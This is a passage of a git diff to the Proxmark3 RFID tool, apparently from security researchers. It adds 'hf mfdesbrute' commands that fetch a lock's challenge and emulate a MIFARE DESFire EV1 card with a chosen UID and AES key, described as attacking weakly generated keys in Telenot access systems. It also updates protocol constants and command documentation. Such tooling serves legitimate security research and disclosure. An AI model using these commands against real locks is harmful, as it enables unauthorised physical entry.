(resp.status == PM3_EOPABORTED && ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK)) { + showSectorTable(k_sector, k_sectorsCount); + } + } + + PrintAndLogEx(INFO, "Done"); + return PM3_SUCCESS; +} + +int CmdHfMfDesBruteOpenDoor(const char *Cmd) { + CLIParserContext *ctx; + CLIParserInit(&ctx, "hf mfdesbrute open_door", + "Tools for attacking weakly generated keys", // TODO fix description + "hf mfdesbrute open_door -t -u -k "); + + void *argtable[] = { + arg_param_begin, + arg_int1("t", "type", "<1-10> ", "Simulation type to use"), + arg_str0("u", "uid", "", "7 byte UID"), + arg_str0("k", "key", "", "16 byte key"), + //arg_lit0("v", "verbose", "verbose output"), + arg_param_end + }; + CLIExecWithReturn(ctx, Cmd, argtable, false); + + int tagtype = arg_get_int(ctx, 1); + + int uid_len = 0; + uint8_t uid[10] = {0}; + CLIGetHexWithReturn(ctx, 2, uid, &uid_len); + + uint16_t flags = 0; + bool useUIDfromEML = true; + + if (uid_len > 0) { + if (uid_len == 7) { + flags |= FLAG_7B_UID_IN_DATA; + } else { + PrintAndLogEx(ERR, "Please specify a 7 byte UID"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + PrintAndLogEx(SUCCESS, "Emulating a" _YELLOW_("DESFIRE EV1 tag")" with " _GREEN_("%d byte UID (%s)"), uid_len, sprint_hex(uid, uid_len)); + useUIDfromEML = false; + } + + int key_len = 0; + uint8_t key[16] = {0}; + CLIGetHexWithReturn(ctx, 3, key, &key_len); + + if (key_len != 16) { + PrintAndLogEx(ERR, "Please specify a key of length 16"); + CLIParserFree(ctx); + return PM3_EINVARG; + } + + CLIParserFree(ctx); + + sector_t *k_sector = NULL; + uint8_t k_sectorsCount = 40; + + if (useUIDfromEML) { + flags |= FLAG_UID_IN_EMUL; + } + + struct { + uint8_t tagtype; + uint16_t flags; + uint8_t uid[10]; + uint8_t key[16]; + } PACKED payload; + + payload.tagtype = tagtype; + payload.flags = flags; + memcpy(payload.uid, uid, uid_len); + memcpy(payload.key, key, key_len); + + clearCommandBuffer(); + SendCommandNG(CMD_HF_MIFARE_EV1_OPEN_DOOR, (uint8_t *)&payload, sizeof(payload)); + PacketResponseNG resp; + + PrintAndLogEx(INFO, "Press pm3-button to abort simulation"); + bool keypress = kbd_enter_pressed(); + while (!keypress) { + + if (WaitForResponseTimeout(CMD_HF_MIFARE_EV1_OPEN_DOOR, &resp, 1500) == 0) continue; + if (resp.status != PM3_SUCCESS) break; + + keypress = kbd_enter_pressed(); + } + + if (keypress) { + if ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK) { + // inform device to break the sim loop since client has exited + SendCommandNG(CMD_BREAK_LOOP, NULL, 0); + } + + if (resp.status == PM3_EOPABORTED && ((flags & FLAG_NR_AR_ATTACK) == FLAG_NR_AR_ATTACK)) { + showSectorTable(k_sector, k_sectorsCount); + } + } + + PrintAndLogEx(INFO, "Done"); + return PM3_SUCCESS; +} + +static command_t CommandTable[] = { + {"help", CmdHelp, AlwaysAvailable, "This help"}, + {"get_challenge", CmdHfMfDesBruteGetChallenge, IfPm3Iso14443a, "Get a challenge from a lock"}, + {"open_door", CmdHfMfDesBruteOpenDoor, IfPm3Iso14443a, "AES auth simulation for Telenot Complex systems"}, + {NULL, NULL, NULL, NULL} +}; + +static int CmdHelp(const char *Cmd) { + (void)Cmd; // Cmd is not used so far + CmdsHelp(CommandTable); + return PM3_SUCCESS; +} + +int CmdHfMfDesBrute(const char *Cmd) { + clearCommandBuffer(); + return CmdsParse(CommandTable, Cmd); +} diff --git a/client/src/cmdhfmfdesbrute.h b/client/src/cmdhfmfdesbrute.h new file mode 100644 index 0000000000..09f4d563d5 --- /dev/null +++ b/client/src/cmdhfmfdesbrute.h @@ -0,0 +1,28 @@ +//----------------------------------------------------------------------------- +// Copyright (C) X41 D-Sec GmbH, Yasar Klawohn, Markus Vervier +// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details. +// +// This program is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// This program is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// See LICENSE.txt for the text of the license. +//----------------------------------------------------------------------------- +// High frequency ISO14443A commands +//----------------------------------------------------------------------------- + +#ifndef CMDHFMFDESBRUTE_H__ +#define CMDHFMFDESBRUTE_H__ + +//static int CmdHelp(const char *Cmd); +int CmdHfMfDesBrute(const char *Cmd); +int CmdHfMfDesBruteGetChallenge(const char *Cmd); +int CmdHfMfDesBruteOpenDoor(const char *Cmd); + +#endif diff --git a/client/src/pm3line_vocabulory.h b/client/src/pm3line_vocabulory.h index 63a438f6d1..23e2a04417 100644 --- a/client/src/pm3line_vocabulory.h +++ b/client/src/pm3line_vocabulory.h @@ -395,6 +395,9 @@ const static vocabulory_t vocabulory[] = { { 0, "hf mfdes value" }, { 0, "hf mfdes clearrecfile" }, { 1, "hf mfdes test" }, + { 1, "hf mfdesbrute help" }, + { 0, "hf mfdesbrute get_challenge" }, + { 0, "hf mfdesbrute open_door" }, { 1, "hf seos help" }, { 0, "hf seos info" }, { 1, "hf seos list" }, diff --git a/doc/commands.json b/doc/commands.json index e3c68d3fca..5da747b4c5 100644 --- a/doc/commands.json +++ b/doc/commands.json @@ -2563,7 +2563,7 @@ }, "hf help": { "command": "hf help", - "description": "-------- ----------------------- high frequency ----------------------- 14a { iso14443a rfids... } 14b { iso14443b rfids... } 15 { iso15693 rfids... } cipurse { cipurse transport cards... } epa { german identification card... } emrtd { machine readable travel document... } felica { iso18092 / felica rfids... } fido { fido and fido2 authenticators... } gallagher { gallagher desfire rfids... } ksx6924 { ks x 6924 (t-money, snapper+) rfids } jooki { jooki rfids... } iclass { iclass rfids... } legic { legic rfids... } lto { lto cartridge memory rfids... } mf { mifare rfids... } mfp { mifare plus rfids... } mfu { mifare ultralight rfids... } mfdes { mifare desfire rfids... } seos { seos rfids... } st25ta { st25ta rfids... } thinfilm { thinfilm rfids... } topaz { topaz (nfc type 1) rfids... } waveshare { waveshare nfc epaper... } ----------- --------------------- general --------------------- help this help list list protocol data in trace buffer search search for known hf tags --------------------------------------------------------------------------------------- hf list available offline: yes alias of `trace list -t raw` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", + "description": "-------- ----------------------- high frequency ----------------------- 14a { iso14443a rfids... } 14b { iso14443b rfids... } 15 { iso15693 rfids... } cipurse { cipurse transport cards... } epa { german identification card... } emrtd { machine readable travel document... } felica { iso18092 / felica rfids... } fido { fido and fido2 authenticators... } gallagher { gallagher desfire rfids... } ksx6924 { ks x 6924 (t-money, snapper+) rfids } jooki { jooki rfids... } iclass { iclass rfids... } legic { legic rfids... } lto { lto cartridge memory rfids... } mf { mifare rfids... } mfp { mifare plus rfids... } mfu { mifare ultralight rfids... } mfdes { mifare desfire rfids... } mfdesbrute { mifare desfire ev1 brute forcing... } seos { seos rfids... } st25ta { st25ta rfids... } thinfilm { thinfilm rfids... } topaz { topaz (nfc type 1) rfids... } waveshare { waveshare nfc epaper... } ----------- --------------------- general --------------------- help this help list list protocol data in trace buffer search search for known hf tags --------------------------------------------------------------------------------------- hf list available offline: yes alias of `trace list -t raw` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", "notes": [ "hf list -f -> show frame delay times", "hf list -1 -> use trace buffer" @@ -5323,15 +5323,17 @@ }, "hf mfdes test": { "command": "hf mfdes test", - "description": "[=] ------ desfire tests ------ [!] no space for crc. pos: 1 [=] crc16............. passed [!] no space for crc. pos: 2 [=] crc32............. passed [=] cmac subkeys...... passed [=] an10922 aes....... passed [=] an10922 2tdea..... passed [=] an10922 3tdea..... passed [=] cmac 3tdea........ passed [=] cmac 2tdea........ passed [=] cmac des.......... passed [=] ev2 session keys.. passed [=] ev2 iv calc....... passed [=] ev2 mac calc...... passed [=] trans session key. passed [=] lrp plaintexts.... passed [=] lrp updated keys.. passed [=] lrp eval.......... passed [=] lrp inc counter... passed [=] lrp encode........ passed [=] lrp decode........ passed [=] lrp subkeys....... passed [=] lrp cmac.......... passed [=] lrp session keys.. passed [=] --------------------------- [+] tests [ ok ] ======================================================================================= hf seos { seos rfids... } --------------------------------------------------------------------------------------- hf seos help available offline: yes help this help list list seos history --------------------------------------------------------------------------------------- hf seos info available offline: no get info from seos tags", + "description": "[=] ------ desfire tests ------ [!] no space for crc. pos: 1 [=] crc16............. passed [!] no space for crc. pos: 2 [=] crc32............. passed [=] cmac subkeys...... passed [=] an10922 aes....... passed [=] an10922 2tdea..... passed [=] an10922 3tdea..... passed [=] cmac 3tdea........ passed [=] cmac 2tdea........ passed [=] cmac des.......... passed [=] ev2 session keys.. passed [=] ev2 iv calc....... passed [=] ev2 mac calc...... passed [=] trans session key. passed [=] lrp plaintexts.... passed [=] lrp updated keys.. passed [=] lrp eval.......... passed [=] lrp inc counter... passed [=] lrp encode........ passed [=] lrp decode........ passed [=] lrp subkeys....... passed [=] lrp cmac.......... passed [=] lrp session keys.. passed [=] --------------------------- [+] tests [ ok ] ======================================================================================= hf mfdesbrute { mifare desfire ev1 brute forcing... } --------------------------------------------------------------------------------------- hf mfdesbrute help available offline: yes help this help --------------------------------------------------------------------------------------- hf mfdesbrute get_challenge available offline: no tools for attacking weakly generated keys", "notes": [ - "hf seos info" + "hf mfdesbrute get_challenge -t -u " ], "offline": true, "options": [ - "-h, --help this help" + "-h, --help this help", + "-t, --type <1-10> simulation type to use", + "-u, --uid 7 byte uid" ], - "usage": "hf seos info [-h]" + "usage": "hf mfdesbrute get_challenge [-h] -t <1-10> [-u ]" }, "hf mfdes value": { "command": "hf mfdes value", @@ -5414,6 +5416,21 @@ ], "usage": "hf mfdes write [-hav] [-n ] [-t ] [-k ] [--kdf ] [-i ] [-m ] [-c ] [--schann ] [--aid ] [--fid ] [--no-auth] [--type ] [-o ] [-d ] [--debit] [--commit] [--updaterec ] [--isoid ] [--fileisoid ] [--readerid ] [--trkey ]" }, + "hf mfdesbrute open_door": { + "command": "hf mfdesbrute open_door", + "description": "tools for attacking weakly generated keys", + "notes": [ + "hf mfdesbrute open_door -t -u -k " + ], + "offline": false, + "options": [ + "-h, --help this help", + "-t, --type <1-10> simulation type to use", + "-u, --uid 7 byte uid", + "-k, --key 16 byte key" + ], + "usage": "hf mfdesbrute open_door [-h] -t <1-10> [-u ] [-k ]" + }, "hf mfp auth": { "command": "hf mfp auth", "description": "executes aes authentication command for mifare plus card", @@ -5886,6 +5903,18 @@ ], "usage": "hf search [-hv]" }, + "hf seos help": { + "command": "hf seos help", + "description": "help this help list list seos history --------------------------------------------------------------------------------------- hf seos info available offline: no get info from seos tags", + "notes": [ + "hf seos info" + ], + "offline": true, + "options": [ + "-h, --help this help" + ], + "usage": "hf seos info [-h]" + }, "hf seos list": { "command": "hf seos list", "description": "alias of `trace list -t 7816` with selected protocol data to annotate trace buffer you can load a trace from file (see `trace load -h`) or it be downloaded from device by default it accepts all other arguments of `trace list`. note that some might not be relevant for this specific protocol", @@ -10402,8 +10431,8 @@ } }, "metadata": { - "commands_extracted": 605, + "commands_extracted": 607, "extracted_by": "PM3Help2JSON v1.00", - "extracted_on": "2022-02-09T14:20:29" + "extracted_on": "2022-02-09T14:29:46" } } \ No newline at end of file diff --git a/doc/commands.md b/doc/commands.md index 35444f00b5..14ffeb4552 100644 --- a/doc/commands.md +++ b/doc/commands.md @@ -576,6 +576,17 @@ Check column "offline" for their availability. |`hf mfdes test `|Y |`Test crypto` +### hf mfdesbrute + + { MIFARE DESFIRE EV1 Brute Forcing... } + +|command |offline |description +|------- |------- |----------- +|`hf mfdesbrute help `|Y |`This help` +|`hf mfdesbrute get_challenge`|N |`Get a challenge from a lock` +|`hf mfdesbrute open_door`|N |`AES auth simulation for Telenot Complex systems` + + ### hf seos { SEOS RFIDs... } diff --git a/include/pm3_cmd.h b/include/pm3_cmd.h index 94eb4d9c00..2f581fde4b 100644 --- a/include/pm3_cmd.h +++ b/include/pm3_cmd.h @@ -639,6 +639,9 @@ typedef struct { #define CMD_HF_DESFIRE_INFO 0x072d #define CMD_HF_DESFIRE_COMMAND 0x072e +#define CMD_HF_MIFARE_EV1_GET_LOCK_CHALLENGE 0x1000 +#define CMD_HF_MIFARE_EV1_OPEN_DOOR 0x1001 + #define CMD_HF_MIFARE_NACK_DETECT 0x0730 #define CMD_HF_MIFARE_STATIC_NONCE 0x0731 diff --git a/include/protocols.h b/include/protocols.h index b13de57ec8..335b560d08 100644 --- a/include/protocols.h +++ b/include/protocols.h @@ -194,6 +194,11 @@ ISO 7816-4 Basic interindustry commands. For command APDU's. #define MIFARE_EV1_UIDF1 0x40 #define MIFARE_EV1_UIDF2 0x20 #define MIFARE_EV1_UIDF3 0x60 +#define MIFARE_EV1_SELECT_APP 0x5A +#define MIFARE_EV1_AUTH_AES 0xAA +#define MIFARE_EV1_AUTH_AES_2 0xAF +#define MIFARE_EV1_GET_FILE_INFO 0xF5 +#define MIFARE_EV1_READ_DATA 0xBD #define MIFARE_ULC_WRITE 0xA2 #define MIFARE_ULC_COMP_WRITE 0xA0